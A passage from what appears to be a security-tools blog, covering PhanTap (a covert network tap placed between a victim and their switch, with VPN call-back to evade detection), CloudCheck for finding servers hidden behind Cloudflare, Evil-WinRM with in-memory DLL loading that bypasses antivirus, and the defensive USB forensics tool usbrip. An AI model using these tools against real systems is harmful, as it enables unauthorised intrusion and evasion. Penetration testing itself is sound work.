<ul style="text-align: left;">
<li>Install PhanTap package:</li>
</ul>
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">opkg install phantap phantap-learn</span><br />
<ul style="text-align: left;">
<li>Configure the Wifi and start administering the router through it.</li>
<li>Either reboot the device, or run <span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">/etc/init.d/phantap setup</span>.</li>
<li>Get the interface names from that device:</li>
</ul>
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;"># uci show network | grep ifname</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">network.loopback.ifname='lo'</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">network.lan.ifname='eth1'</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">network.wan.ifname='eth0'</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">network.wan6.ifname='eth0'</span><br />
<br />
In this example we are using a GL-AR150, which only has 2 interfaces.<br />
<br />
Add the interfaces to the phantap bridge via the following commands in the cli (assuming we are using a GL-AR150):<br />
<ul style="text-align: left;">
<li><span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">uci delete network.lan.ifname</span></li>
<li><span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">uci delete network.wan.ifname</span></li>
<li><span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">uci delete network.wan6.ifname</span></li>
<li><span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">uci set network.phantap.ifname='eth0 eth1'</span></li>
<li><span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">uci commit network</span></li>
<li><span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">/etc/init.d/network reload</span></li>
</ul>
<br />
Phantap is now configured, as soon as you plug it between a victim and their switch, it will automatically configure the router and give it Internet access.<br />
<br />
You can add your favorite VPN to have a remote connection back. Tested PhanTap with Vpn, port TCP 443, to avoid some detection methods.<br />
<br />
You can also add a command to be ran when a new IP or DNS is configured, in <span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">/etc/config/phantap, e.g. /etc/init.d/openvpn restart</span> (restart VPN service).<br />
<br />
You can also look at disabling the wifi by default and using hardware buttons to start it (<span style="color: blue; font-family: "courier new" , "courier" , monospace;">https://openwrt.org/docs/guide-user/hardware/hardware.button</span>).<br />
<br />
<h3 style="text-align: left;">
<span style="color: #073763;">Limitations or how it can be detected :</span></h3>
<ul style="text-align: left;">
<li>The GL.iNet GL-AR150 and most inexpensive devices only support 100Mbps, meanwhile modern network traffic will be 1Gbps.</li>
<li>The network port will stay up, switch side, when the victim device is disconnected/shutdown.</li>
<li>There is no re-configuration of PhanTap, so we might use an IP that has been reattributed to another device (roadmap DHCP).</li>
<li>Some traffic is blocked by the Linux bridge (STP/Pause frames/LACP).</li>
</ul>
<br />
<h3 style="text-align: left;">
<span style="color: #073763;">Roadmap :</span></h3>
<ul style="text-align: left;">
<li>Add logic to restart the detection when the links go up/down.</li>
<li>Add DHCP packet analysis for dynamic reconfiguration.</li>
<li>Add IPv6 support.</li>
<li>Test limitations of devices that have switches(swconfig) instead of separate interfaces.</li>
</ul>
<div>
<span style="font-size: large;"><a href="https://github.com/nccgroup/phantap" target="_blank">Download PhanTap</a></span></div>
</div>
Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-8244923499446330076.post-64368713115308039972019-08-02T22:33:00.000+05:302019-08-02T22:34:12.442+05:30CloudCheck- To Test String If A Cloudflare DNS Bypass is Possible <div dir="ltr" style="text-align: left;" trbidi="on">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjnkjvSCrbDESbRIBUTtX-Pw5cFUD_9S09ZgmFQYx-VyGXMGIFBxpJRiMLQ28XXc-_Jbu3H6AUiAokEAm5SLJHuJfDGDRzyxQ_TxWZxijU1eCB9jCuT00XcPpFoagbSYATweDjuUPLEXvIi/s1600/cloudcheck.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" data-original-height="664" data-original-width="986" height="430" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjnkjvSCrbDESbRIBUTtX-Pw5cFUD_9S09ZgmFQYx-VyGXMGIFBxpJRiMLQ28XXc-_Jbu3H6AUiAokEAm5SLJHuJfDGDRzyxQ_TxWZxijU1eCB9jCuT00XcPpFoagbSYATweDjuUPLEXvIi/s640/cloudcheck.png" width="640" /></a></div>
<br />
<h3 style="text-align: left;">
<span style="color: #073763;">CloudCheck- To Test String If A Cloudflare DNS Bypass is Possible </span></h3>
<br />
Cloudcheck is made to be used in the same folder as <a href="https://github.com/m0rtem/CloudFail" target="_blank">CloudFail</a>. Make sure all files in this repo are in the same folder before using.<br />
<br />
CloudFail is a tactical reconnaissance tool which aims to gather enough information about a target protected by Cloudflare in the hopes of discovering the location of the server.<br />
<br />
Using Tor to mask all requests, the tool as of right now has 3 different attack phases.<br />
<ul style="text-align: left;">
<li>Misconfigured DNS scan using DNSDumpster.com.</li>
<li>Scan the Crimeflare.com database.</li>
<li>Bruteforce scan over 2500 subdomains.</li>
</ul>
<br />
Cloudcheck create a empty text file called <span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">none.txt</span> in the data folder, that way it doesn't do a subdomain brute when testing.<br />
<br />
Cloudcheck will automatically change your hosts file, using entries from CloudFail and test for a specified string to detect if said entry can be used to bypass Cloudflare.<br />
<br />
If output comes out to be "True", you can use the IP address to bypass Cloudflare in your hosts file. (Later automating this process)<br />
<br />
<span style="font-size: large;"><a href="https://github.com/ANK1036Official/Cloudcheck" target="_blank">Download Cloudcheck</a></span><br />
<br /></div>
Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-8244923499446330076.post-84051958983077551282019-07-31T17:51:00.000+05:302019-07-31T17:52:10.216+05:30The Ultimate WinRM Shell For Penetration Testing<div dir="ltr" style="text-align: left;" trbidi="on">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiC2dtjkLURh85sw5WQcATG6RucvUEy9ZFhfg_ZG__52ook0FQfpnew6k73ajYkKZQUoWOWTQpl5PeN-_j_4TM9AqDB1wTp5ZbctWXdFiZSQUy9uU2mtDG1f4pnApKnHi0oit8VQDWoTjMf/s1600/Evil+WinRM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="411" data-original-width="579" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiC2dtjkLURh85sw5WQcATG6RucvUEy9ZFhfg_ZG__52ook0FQfpnew6k73ajYkKZQUoWOWTQpl5PeN-_j_4TM9AqDB1wTp5ZbctWXdFiZSQUy9uU2mtDG1f4pnApKnHi0oit8VQDWoTjMf/s1600/Evil+WinRM.png" /></a></div>
<h2 style="text-align: left;">
<span style="color: #073763;"><br /></span></h2>
<h2 style="text-align: left;">
<span style="color: #073763;">This shell is the ultimate WinRM shell for hacking/pentesting.</span></h2>
<div>
<span style="color: #073763;"><br /></span></div>
<h3 style="text-align: left;">
<span style="color: #073763;">WinRM (Windows Remote Management) is the Microsoft implementation of WS-Management Protocol. </span></h3>
<br />
A standard SOAP based protocol that allows hardware and operating systems from different vendors to interoperate. Microsoft included it in their Operating Systems in order to make life easier to system adminsitrators.<br />
<br />
This program can be used on any Microsoft Windows Servers with this feature enabled (usually at port 5985), of course only if you have credentials and permissions to use it. So we can say that it could be used in a post-exploitation hacking/pentesting phase.<br />
<br />
The purpose of this program is to provide nice and easy-to-use features for hacking. It can be used with legitimate purposes by system administrators as well but the most of its features are focused on hacking/pentesting stuff.<br />
<br />
<h2 style="text-align: left;">
<span style="color: #073763;">
Features</span></h2>
<ul style="text-align: left;">
<li>Command History</li>
<li>WinRM command completion</li>
<li>Local files completion</li>
<li>Upload and download files</li>
<li>List remote machine services</li>
<li>FullLanguage Powershell language mode</li>
<li>Load Powershell scripts</li>
<li>Load in memory dll files bypassing some AVs</li>
<li>Load in memory C# (C Sharp) compiled exe files bypassing some AVs</li>
<li>Colorization on output messages (can be disabled optionally)</li>
</ul>
<div>
<br /></div>
<h3 style="text-align: left;">
<span style="color: #073763;">Help</span></h3>
<b>Usage: </b><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">evil-winrm -i IP -u USER -s SCRIPTS_PATH -e EXES_PATH [-P PORT] [-p PASS] [-U URL]</span><br />
<br />
<ul style="text-align: left;">
<li><span style="font-family: "courier new" , "courier" , monospace;"><span style="background-color: #f3f3f3; color: #274e13;">-i, --ip IP</span> </span> Remote host IP or hostname (required)</li>
<li><span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">-P, --port PORT</span> Remote host port (default 5985)</li>
<li>-<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">u, --user USER</span> Username (required)</li>
<li><span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">-p, --password PASS</span> Password</li>
<li><span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">-s, --scripts PS_SCRIPTS_PATH</span> Powershell scripts path (required)</li>
<li><span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">-e, --executables EXES_PATH</span> C# executables path (required)</li>
<li><span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">-U, --url URL</span> Remote url endpoint (default /wsman)</li>
<li><span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">-V, --version</span> Show version</li>
<li><span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">-h, --help</span> Display this help message</li>
</ul>
<h3 style="text-align: left;">
<span style="color: #073763;"><br /></span></h3>
<h3 style="text-align: left;">
<span style="color: #073763;">Requirements</span></h3>
Ruby 2.3 or higher is needed. Some ruby gems are needed as well: winrm >=2.3.2, winrm-fs >=1.3.2, stringio >=0.0.2 and colorize >=0.8.1.<br />
<br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">~$ sudo gem install winrm winrm-fs colorize stringio</span><br />
<br />
<h3 style="text-align: left;">
<span style="color: #073763;">Installation </span></h3>
<b>Step 1. Clone the repo: </b><br />
<br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">git clone https://github.com/Hackplayers/evil-winrm.git</span><br />
<br />
<b>Step 2. Ready. Just launch it!</b><br />
<br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;"> ~$ cd evil-winrm && ruby evil-winrm.rb -i 192.168.1.100 -u Administrator -p 'MySuperSecr3tPass123!' -s '/home/foo/ps1_scripts/' -e '/home/foo/exe_files/'</span><br />
<br />
If you don't want to put the password in clear text, you can optionally avoid to set -p argument and the password will be prompted preventing to be shown.<br />
<br />
To use IPv6, the address must be added to /etc/hosts.<br />
<br />
<b><span style="color: #073763;">Alternative installation method as ruby gem</span></b><br />
<br />
<b>Step 1. Install it: </b><br />
<b><br /></b>
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">gem install evil-winrm</span><br />
<br />
<b>Step 2. Ready. Just launch it!</b><br />
<br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;"> ~$ evil-winrm -i 192.168.1.100 -u Administrator -p 'MySuperSecr3tPass123!' -s '/home/foo/ps1_scripts/' -e '/home/foo/exe_files/'</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;"><br /></span>
<br />
<h3 style="text-align: left;">
<span style="color: #073763;">Documentation</span></h3>
<b><span style="color: #073763;">Basic commands</span></b><br />
<br />
<ul style="text-align: left;">
<li><b>upload: </b>local files can be auto-completed using tab key. It is not needed to put a remote_path if the local file is in the same directory as evil-winrm.rb file.</li>
</ul>
<ul style="text-align: left;">
<li><b>usage: </b>upload local_path remote_path</li>
</ul>
<ul style="text-align: left;">
<li><b>download:</b> it is not needed to set local_path if the remote file is in the current directory.</li>
</ul>
<ul style="text-align: left;">
<li><b>usage: </b>download remote_path local_path</li>
</ul>
<ul style="text-align: left;">
<li><b>services: </b>list all services. No administrator permissions needed.</li>
</ul>
<ul style="text-align: left;">
<li><b>menu: </b>load the Invoke-Binary and l04d3r-LoadDll functions that we will explain below. When a ps1 is loaded all its functions will be shown up.</li>
</ul>
<h3 style="text-align: left;">
<span style="color: #073763;">Load powershell scripts</span></h3>
To load a ps1 file you just have to type the name (auto-completion usnig tab allowed). The scripts must be in the path set at -s argument. Type menu again and see the loaded functions.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgiJGtKO0GDFpcq5R7yVsvQ8D1lEnYO2BpjqbUW0Qvb0npjfILlzb6inJz_00d1eVVzdwo8t3EJe5MvckSiUkq1y96sRd_2cqAZxnoukp5wqNTD4kcqXxqJ7oyJoOhpHsppDBNpdWwgXp2i/s1600/Evil+WinRM+Screenshot1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="632" data-original-width="590" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgiJGtKO0GDFpcq5R7yVsvQ8D1lEnYO2BpjqbUW0Qvb0npjfILlzb6inJz_00d1eVVzdwo8t3EJe5MvckSiUkq1y96sRd_2cqAZxnoukp5wqNTD4kcqXxqJ7oyJoOhpHsppDBNpdWwgXp2i/s1600/Evil+WinRM+Screenshot1.png" /></a></div>
<br />
<h3 style="text-align: left;">
<span style="color: #073763;">Advanced commands</span></h3>
<b>Invoke-Binary:</b> allows exes compiled from c# to be executed in memory. The name can be auto-completed using tab key and allows up to 3 parameters. The executables must be in the path set at -e argument.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhHUOIBavPAl9Kj9BMqx0SS9GQ6mnJO9DtrzFxIiEjOZDAVEVaW2XANRaYEKL-K4PCWEFuuIQpJN754dfgPmXijIYXSbdVssDoGzbUeX7dU0c2q_Xu0hEbDXyNQ_z661U7WkamgD2Fkl3eH/s1600/Evil+WinRM+Advance+Commands+Screenshot.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" data-original-height="359" data-original-width="1055" height="217" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhHUOIBavPAl9Kj9BMqx0SS9GQ6mnJO9DtrzFxIiEjOZDAVEVaW2XANRaYEKL-K4PCWEFuuIQpJN754dfgPmXijIYXSbdVssDoGzbUeX7dU0c2q_Xu0hEbDXyNQ_z661U7WkamgD2Fkl3eH/s640/Evil+WinRM+Advance+Commands+Screenshot.png" width="640" /></a></div>
<br />
<br />
<b>l04d3r-LoadDll: </b>allows loading dll libraries in memory, it is equivalent to: <span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">[Reflection.Assembly]::Load([IO.File]::ReadAllBytes("pwn.dll"))</span><br />
<br />
The dll file can be hosted by smb, http or locally. Once it is loaded type menu, then it is possible to autocomplete all functions.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhVem8psaHDZUq_Kz-ovpSwmJSFCVIVpwMUiDZoJXtQkdoyllOkXkbShqJ_KwI4rRRLwoGbe383cnjIzERH3f9ifRsyyDg3Cwwnxbc1WbIKrQpXqn1p91zV0Ikmos8VTtlTmBKSwxAMngVh/s1600/Evil+WinRM+Loader.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" data-original-height="420" data-original-width="913" height="293" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhVem8psaHDZUq_Kz-ovpSwmJSFCVIVpwMUiDZoJXtQkdoyllOkXkbShqJ_KwI4rRRLwoGbe383cnjIzERH3f9ifRsyyDg3Cwwnxbc1WbIKrQpXqn1p91zV0Ikmos8VTtlTmBKSwxAMngVh/s640/Evil+WinRM+Loader.png" width="640" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiZU_pjga6wycTzH9a4Csmel21PwWaY_P7rUrdcwBEsOva7vnyv2zbDRmcg81mcZEZuWVBr-cdm-qxz5mhE3KdJ9mdSJJdF_sZjK6cYVM_Vb7Uv5bCO_ajJRZhQgMXuw7knc413Wh_tPLrK/s1600/Evil+WinRM+Sharpsploit.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" data-original-height="741" data-original-width="1077" height="440" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiZU_pjga6wycTzH9a4Csmel21PwWaY_P7rUrdcwBEsOva7vnyv2zbDRmcg81mcZEZuWVBr-cdm-qxz5mhE3KdJ9mdSJJdF_sZjK6cYVM_Vb7Uv5bCO_ajJRZhQgMXuw7knc413Wh_tPLrK/s640/Evil+WinRM+Sharpsploit.png" width="640" /></a></div>
<br />
<br />
<b>Extra features</b><br />
<b><br /></b>
To disable colors just modify on code this variable <span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">$colors_enabled</span>. Set it to false: <span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">$colors_enabled = false</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;"><br /></span>
<br />
<h3 style="text-align: left;">
<span style="color: #0c343d; font-family: inherit;"><span style="background-color: white;">Disclaimer </span></span></h3>
<span style="background-color: white;"><i><span style="font-family: "trebuchet ms" , sans-serif;">Evil-WinRM should be used for authorized penetration testing and/or nonprofit educational purposes only. Any misuse of this software will not be the responsibility of the author or of any other collaborator. Use it at your own servers and/or with the server owner's permission.</span></i></span><br />
<br />
<span style="font-size: large;"><a href="https://github.com/Hackplayers/evil-winrm" target="_blank">Download Winrm</a></span></div>
Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-8244923499446330076.post-90729736010789405032019-07-29T12:48:00.001+05:302019-07-29T12:49:40.220+05:30USBRIP- Simple Command Live Forensic Tool For Tracking USB device<div dir="ltr" style="text-align: left;" trbidi="on">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhZgIpfh9FOilehIBn8Z19VRikZGzBiULIkAENd0YfMLtW9YGZXTs_uBsMAvkd64kknyDV9jTwn9i7Jh1Ul1j_r590m_RY5qj7r4ll6VhvYIj-X-mzkibNU_ruRfhyDi1lVyxHL_2UAedOE/s1600/USBrip+Screenshot.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img alt="USBRIP- Simple Command Live Forensic Tool For Tracking USB device" border="0" data-original-height="717" data-original-width="1013" height="452" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhZgIpfh9FOilehIBn8Z19VRikZGzBiULIkAENd0YfMLtW9YGZXTs_uBsMAvkd64kknyDV9jTwn9i7Jh1Ul1j_r590m_RY5qj7r4ll6VhvYIj-X-mzkibNU_ruRfhyDi1lVyxHL_2UAedOE/s640/USBrip+Screenshot.png" title="USBRIP- Simple Command Live Forensic Tool For Tracking USB device" width="640" /></a></div>
<h2 style="text-align: left;">
<span style="color: #073763;">Simple command line forensics tool for tracking USB device artifacts (history of USB events) on GNU/Linux.</span></h2>
<br />
<b>usbrip</b> (derived from "USB Ripper", not "USB R.I.P." astonished) is an open source forensics tool with CLI interface that lets you keep track of USB device artifacts (aka USB event history, "Connected" and "Disconnected" events) on Linux machines.<br />
<br />
usbrip is a small piece of software written in pure Python 3 (using some external modules though, see <a href="https://github.com/snovvcrash/usbrip#pip-packages" target="_blank">Dependencies/PIP</a>) which parses Linux log files (<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">/var/log/syslog</span>* or <span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">/var/log/messages</span>* depending on the distro) for constructing USB event history tables. Such tables may contain the following columns: "Connected" (date & time), "User", "VID" (vendor ID), "PID" (product ID), "Product", "Manufacturer", "Serial Number", "Port" and "Disconnected" (date & time).<br />
<b><br /></b>
<b><span style="color: #073763;">Besides, it also can:</span></b><br />
<ul style="text-align: left;">
<li>export gathered information as a JSON dump (and open such dumps, of course);</li>
<li>generate a list of authorized (trusted) USB devices as a JSON (call it auth.json);</li>
<li>search for "violation events" based on the auth.json: show (or generate another JSON with) USB devices that do appear in history and do NOT appear in the auth.json;</li>
<li>When installed with -s flag create crypted storages (7zip archives) to automatically backup and accumulate USB events with the help of crontab scheduler;</li>
<li>search additional details about a specific USB device based on its VID and/or PID.</li>
</ul>
<br />
<h3 style="text-align: left;">
<span style="color: #073763;">Quick Start</span></h3>
usbrip is available for download and installation at <a href="https://pypi.org/project/usbrip/" target="_blank">PyPI</a>:<br />
<br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">$ pip3 install usbrip</span><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjKgEMnIHZb1A08vNcWex-Tx5KR5aDO13cJ__gzDDcbbtDcj4zQgsP54WQOCg7wcAZ8GYIwd5pgmbN0_xmGexRAAnofnkBSfQ_099dPa3GMUjffQ8NLhyphenhyphenPCzE77k5JOTRYEBNWy9ZRX6yH9/s1600/USBrip+Screenshot1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em; text-align: center;"><img border="0" data-original-height="449" data-original-width="499" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjKgEMnIHZb1A08vNcWex-Tx5KR5aDO13cJ__gzDDcbbtDcj4zQgsP54WQOCg7wcAZ8GYIwd5pgmbN0_xmGexRAAnofnkBSfQ_099dPa3GMUjffQ8NLhyphenhyphenPCzE77k5JOTRYEBNWy9ZRX6yH9/s1600/USBrip+Screenshot1.png" /></a></div>
<br />
<br />
<h3 style="text-align: left;">
<span style="color: #073763;">Git Clone</span></h3>
For simplicity, lets agree that all the commands where ~/usbrip$ prefix is appeared are executed in the ~/usbrip directory which is created as a result of git clone:<br />
<br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">~$ git clone https://github.com/snovvcrash/usbrip.git usbrip && cd usbrip</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">~/usbrip$</span><br />
<br />
<h3 style="text-align: left;">
<span style="color: #073763;">Dependencies</span></h3>
usbrip works with non-modified structure of system log files only, so, unfortunately, it won't be able to parse USB history if you change the format of syslogs (with <span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">syslog-ng</span> or <span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">rsyslog</span>, for example). That's why the timestamps of "Connected" and "Disconnected" fields don't have the year, by the way. Keep that in mind.<br />
<br />
<h3 style="text-align: left;">
<span style="color: #073763;">DEB Packages</span></h3>
<ul style="text-align: left;">
<li>python3.6 (or newer) interpreter</li>
<li>python3-venv</li>
<li>p7zip-full (used by storages module)</li>
<li>~$ sudo apt install -y python3-venv p7zip-full</li>
</ul>
<br />
<h3 style="text-align: left;">
<span style="color: #073763;">PIP Packages</span></h3>
<b>usbrip makes use of the following external</b> <b>modules:</b><br />
<ul style="text-align: left;">
<li>terminaltables</li>
<li>termcolor</li>
</ul>
<br />
To resolve Python dependencies manually (it's not necessary actually because pip or setup.py can automate the process, see Installation) create a virtual environment (optional) and run pip from within:<br />
<br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">~/usbrip$ python3 -m venv venv && source venv/bin/activate</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">(venv) ~/usbrip$ pip install -r requirements.txt</span><br />
<br />
<b>Or let the pipenv one-liner do all the dirty work for you:</b><br />
<br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">~/usbrip$ pipenv install && pipenv shell</span><br />
<br />
<b>After that you can run usbrip portably:</b><br />
<br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">(venv) ~/usbrip$ python -m usbrip -h</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">Or</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">(venv) ~/usbrip$ python __main__.py -h</span><br />
<br />
<h3 style="text-align: left;">
<span style="color: #073763;">Installation</span></h3>
There are two ways to install usbrip into the system: pip or setup.py.<br />
<br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">pip or setup.py</span><br />
<br />
First of all, usbrip is pip installable. This means that after git cloning the repo you can simply fire up the pip installation process and after that run usbrip from anywhere in your terminal like so:<br />
<br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">~/usbrip$ python3 -m venv venv && source venv/bin/activate</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">(venv) ~/usbrip$ pip install .</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;"><br /></span>
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">(venv) ~/usbrip$ usbrip -h</span><br />
<br />
Or if you want to resolve Python dependencies locally (without bothering PyPI), use setup.py:<br />
<br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">~/usbrip$ python3 -m venv venv && source venv/bin/activate</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">(venv) ~/usbrip$ python setup.py install</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;"><br /></span>
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">(venv) ~/usbrip$ usbrip -h</span><br />
<br />
alien Note: you'd likely want to run the installation process while the Python virtual environment is active (like it is shown above).<br />
<br />
<h3 style="text-align: left;">
<span style="color: #073763;">install.sh</span></h3>
Secondly, usbrip can also be installed into the system with the ./installers/install.sh script.<br />
<br />
When using the ./installers/install.sh some extra features become available:<br />
<ul style="text-align: left;">
<li>the virtual environment is created automatically;</li>
<li>the storage module becomes available: you can set a crontab job to backup USB events on a schedule (the example of crontab jobs can be found in usbrip/cron/usbrip.cron).</li>
</ul>
<br />
<i><span style="font-family: "trebuchet ms" , sans-serif;"><b>Warning:</b> if you are using the crontab scheduling, you want to configure the cron job with </span><span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">sudo crontab -e</span><span style="font-family: "trebuchet ms" , sans-serif;"> in order to force the storage update submodule run as root as well as protect the passwords of the USB event storages. The storage passwords are kept in </span><span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">/var/opt/usbrip/usbrip.ini</span><span style="font-family: "trebuchet ms" , sans-serif;">.</span></i><br />
<br />
The ./installers/uninstall.sh script removes all the installation artifacts from your system.<br />
<br />
<b>To install usbrip use:</b><br />
<br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">~/usbrip$ chmod +x ./installers/install.sh</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">~/usbrip$ sudo -H ./installers/install.sh [-l/--local] [-s/--storages]</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">~/usbrip$ cd</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;"><br /></span>
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">~$ usbrip -h</span><br />
<br />
<ul style="text-align: left;">
<li>When <span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">-l </span>switch is enabled, Python dependencies are resolved from local .tar packages (<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">./3rdPartyTools/</span>) instead of PyPI.</li>
<li>When <span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">-s</span> switch is enabled, not only the usbrip project is installed, but also the list of trusted USB devices, history and violations storages are created.</li>
</ul>
<br />
<b>Note: </b>when using -s option during installation, make sure that system logs do contain at least one external USB device entry. It is a necessary condition for usbrip to successfully create the list of trusted devices (and as a result, successfully create the violations storage).<br />
<br />
After the installation completes, feel free to remove the usbrip folder.<br />
<br />
<h3 style="text-align: left;">
<span style="color: #073763;">Paths</span></h3>
<b>When installed, the usbrip uses the following paths:</b><br />
<ul style="text-align: left;">
<li><span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">/opt/usbrip/ —</span> project's main directory;</li>
<li><span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">/var/opt/usbrip/usbrip.ini —</span> usbrip configuration file: keeps passwords for 7zip storages;</li>
